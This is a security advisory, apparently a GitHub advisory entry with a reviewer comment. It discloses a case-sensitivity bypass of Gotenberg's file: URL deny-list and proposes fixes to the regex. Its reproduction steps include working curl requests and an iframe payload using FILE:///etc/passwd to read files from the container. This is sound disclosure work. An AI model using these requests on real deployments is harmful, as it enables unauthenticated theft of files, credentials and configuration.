+ "details": "### Impact\n\nThe fix introduced in version 8.1.0 for GHSA-rh2x-ccvw-q7r3 (CVE-2024-21527) can be bypassed using mixed-case or uppercase URL schemes.\n\nThe default `--chromium-deny-list` value is `^file:(?!//\\/tmp/).*`. This regex is anchored to lowercase `file:` at the start. However, per RFC 3986 Section 3.1, URI schemes are case-insensitive. Chromium normalizes the scheme to lowercase before navigation, so a URL like `FILE:///etc/passwd` or `File:///etc/passwd` bypasses the deny-list check but still gets resolved by Chromium as `file:///etc/passwd`.\n\nThe root cause is in `pkg/gotenberg/filter.go` — the `FilterDeadline` function compiles the deny-list regex with `regexp2.MustCompile(denied.String(), 0)`, where `0` means no flags (case-sensitive). Since the regex pattern itself doesn't include a `(?i)` flag, matching is strictly case-sensitive.\n\nThis affects both the URL endpoint and HTML conversion (via iframes, link tags, etc.).\n\n### Steps to Reproduce\n\n1. Start Gotenberg with default settings:\n\n```bash\ndocker run --rm -p 3000:3000 gotenberg/gotenberg:8.26.0 gotenberg\n```\n\n2. Read `/etc/passwd` via the URL endpoint using an uppercase scheme:\n\n```bash\ncurl -X POST 'http://localhost:3000/forms/chromium/convert/url' \\\n --form 'url=FILE:///etc/passwd' -o output.pdf\n```\n\n3. Open `output.pdf` — it contains the contents of `/etc/passwd`.\n\n4. Alternatively, create an `index.html`:\n\n```html\n<iframe src=\"FILE:///etc/passwd\" width=\"100%\" height=\"100%\"></iframe>\n```\n\nThen convert it:\n\n```bash\ncurl -X POST 'http://localhost:3000/forms/chromium/convert/html' \\\n -F 'files=@index.html' -o output.pdf\n```\n\n5. The resulting PDF contains `/etc/passwd` contents.\n\nMixed-case variants like `File:`, `fILE:`, `fiLE:` etc. 
all work as well.\n\n### Root Cause\n\n- `pkg/modules/chromium/chromium.go` defines the default deny-list as `^file:(?!//\\/tmp/).*`\n- `pkg/gotenberg/filter.go` compiles this with `regexp2.MustCompile(denied.String(), 0)` — flag `0` means case-sensitive\n- `pkg/modules/chromium/events.go` uses `FilterDeadline` to check intercepted request URLs against the deny-list\n- Chromium normalizes URL schemes to lowercase, so `FILE:///etc/passwd` becomes `file:///etc/passwd` after the deny-list check has already passed\n\n### Suggested Fix\n\nChange the default deny-list regex to use a case-insensitive flag:\n\n```\n(?i)^file:(?!//\\/tmp/).*\n```\n\nOr apply case-insensitive matching in `FilterDeadline` when compiling the regex.\n\n### Severity\n\nThis is effectively the same impact as CVE-2024-21527 — unauthenticated arbitrary file read from the Gotenberg container. An attacker can leak environment variables, configuration, credentials, and other sensitive data.",
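Review bot: the proposed default `(?i)^file:(?!//\/tmp/).*` applies case-insensitivity to the whole pattern, so the `/tmp/` carve-out would then also match `/TMP/` or `/Tmp/`; since the RFC 3986 argument in the text only covers the scheme, scoping the inline flag to the scheme, e.g. `^(?i:file):(?!//\/tmp/).*`, keeps the path exception strict while still catching `FILE:` and `File:`. For the same reason, the alternative of compiling every pattern with `regexp2.IgnoreCase` in `FilterDeadline` would also change how user-supplied allow/deny patterns match on paths, so lowercasing the scheme of the intercepted URL before matching (mirroring the Chromium normalization the advisory describes) is the more precise code-side option, and the advisory should state which of the two approaches the fix actually takes.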